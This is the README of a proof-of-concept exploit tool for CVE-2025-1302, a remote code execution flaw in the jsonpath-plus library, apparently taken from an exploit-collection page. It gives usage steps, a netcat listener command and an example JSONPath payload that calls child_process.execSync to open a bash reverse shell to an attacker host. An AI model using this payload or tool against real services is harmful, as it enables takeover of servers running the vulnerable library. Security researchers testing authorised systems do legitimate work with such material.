PoC exploit and vulnerable server demo for CVE-2025-1302 in jsonpath-plus.
## CVE-2025-1302 JSONPath-Plus RCE PoC
**PoC Script Name:** `poc.py`
A proof-of-concept exploit script for CVE-2025-1302, which targets an RCE vulnerability in the `jsonpath-plus` library. When run against a vulnerable service endpoint, the script attempts to trigger remote code execution via a JSONPath payload and establish a reverse shell back to the attacker.
---
### Features
* **Flexible HTTP methods**: Supports **POST**, **GET**, or **AUTO** (POST with GET fallback) via `--method` or `--no-fallback` flags.
* **Custom payloads**: Load one or more JSONPath RCE payload templates from a file, with `{ip}` and `{port}` templating.
* **Built-in default payload**: If no payload file is provided, uses a fully-formed bash reverse shell template.
* **Verbose debugging**: Prints full request/response bodies for both POST and GET attempts when they fail.
* **Progress indicators**: Displays delay and payload loops with `tqdm` progress bars.
* **Logging**: Optionally save all results to a JSON file with `--output`.
### Installation
1. Clone this repository:
```bash
git clone https://github.com/yourorg/jsonpath-rce-poc.git
cd jsonpath-rce-poc
```
2. Install dependencies (requires Python 3.6+):
```bash
pip install -r requirements.txt
```
### Usage
1. Start a listener on your attacker machine (replace port as needed):
```bash
nc -lvnp 9999
```
2. Run the PoC:
```bash
python3 poc.py \
--url http://TARGET_HOST:PORT/query \
--ip ATTACKER_IP --port 9999 \
[--payload-file payloads.txt] \
[--delay 5] \
[--method AUTO|POST|GET] \
[--no-fallback] \
[--output results.json]
```
* **`--payload-file`**: File containing one JSONPath payload per line. Use `{ip}` and `{port}` placeholders.
* **`--delay`**: Seconds to wait before sending payloads (shows countdown).
* **`--method`**: Force `POST`, `GET`, or `AUTO` (default).
* **`--no-fallback`**: Shorthand to skip any GET retry (equivalent to `--method POST`).
* **`--output`**: Path to save JSON log of attempts.
### Example Payload File
```text
$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
```
### Contribution
1. Fork the repo and create a feature branch.
2. Submit a pull request with your changes.
### Disclaimer
Use this script **only** in controlled lab environments against systems you own or have explicit permission to test. Abuse may be illegal and unethical.
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view